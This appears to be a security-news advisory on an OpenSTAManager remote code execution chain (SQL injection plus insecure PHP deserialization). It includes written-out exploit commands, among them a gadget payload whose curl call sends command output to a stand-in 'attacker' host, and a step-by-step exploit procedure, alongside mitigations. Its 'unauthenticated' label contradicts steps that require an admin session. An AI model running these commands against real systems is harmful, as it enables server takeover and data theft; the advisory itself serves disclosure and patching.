OpenSTAManager, Unauthenticated RCE via SQL Injection + Insecure Deserialization, GHSA-2fr7-cc4f-wh98 (Critical)

Listen to this Post

How the CVE Works:

The vulnerability chain combines a pre‑authenticated SQL injection (GHSA-2fr7-cc4f-wh98) with an unauthenticated insecure deserialization in oauth2.php. The oauth2.php endpoint sets $skip_permissions = true, making it accessible without any authentication. It takes an attacker‑controlled `state` GET parameter and queries the `zz_oauth2` table for a record matching that state. The record’s `access_token` column is then passed to `unserialize()` without any class restrictions. An attacker who can write to the `zz_oauth2` table (using the SQL injection in the Aggiornamenti module) can insert a malicious PHP object (gadget chain). When the unauthenticated request triggers the deserialization, the gadget chain executes arbitrary commands as the `www‑data` user. The SQL injection is performed via the `risolvi‑conflitti‑database` action, which allows raw SQL queries. To make the INSERT persist despite an `exit()` later, the attacker includes DDL statements (e.g., CREATE TABLE) that force an implicit commit. The deserialization uses a Laravel gadget chain (Laravel/RCE22) that leverages `PendingBroadcast::__destruct()` to call system(). The command runs during error cleanup, even though the HTTP response is a 500 error.

DailyCVE Form:

Platform: OpenSTAManager
Version: 2.10.1 affected
Vulnerability : Unauthenticated RCE
Severity: Critical
date: 2026-04-01

Prediction: Patch April 15

Analytics

What Undercode Say:

Generate Laravel/RCE22 payload with phpggc inside the container
docker exec osm-web php /tmp/phpggc/phpggc Laravel/RCE22 system 'curl http://attacker:9999/rce-$(id|base64)'
Trigger the SQL injection to plant the payload (authenticated)
curl -X POST http://target/actions.php \
-H "Cookie: PHPSESSID=..." \
-d "op=risolvi-conflitti-database&id_module=6&queries=[\"INSERT INTO zz_oauth2 ...\"]"
Unauthenticated trigger that deserializes and executes the command
curl "http://target/oauth2.php?state=poc-xxx&code=x"

How Exploit:

  1. Authenticate as an admin to obtain a session cookie.
  2. Find the “Aggiornamenti” module ID (e.g., via sidebar or database query).
  3. Use `risolvi‑conflitti‑database` to execute raw SQL that inserts a malicious serialized object into zz_oauth2.access_token; include DDL statements to force commit.
  4. Send a GET request to `oauth2.php` with the same `state` value; the `unserialize()` triggers the gadget chain and runs the command.

Protection from this CVE

  • Restrict `unserialize()` by specifying `[‘allowed_classes’ => [AccessToken::class]]` in src/Models/OAuth2.php.
  • Replace serialize()/unserialize() with json_encode()/json_decode() for token storage.
  • Remove `$skip_permissions = true` from `oauth2.php` and require authentication, or validate the `state` parameter against a server‑side session value.
  • Apply the patch for GHSA-2fr7-cc4f-wh98 to fix the underlying SQL injection.

Impact

  • Confidentiality: Read any file, database credentials, and API keys.
  • Integrity: Write files, install backdoors, modify application logic.
  • Availability: Delete files, cause denial of service.
  • Scope: Command execution as `www‑data` enables pivoting to internal systems.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top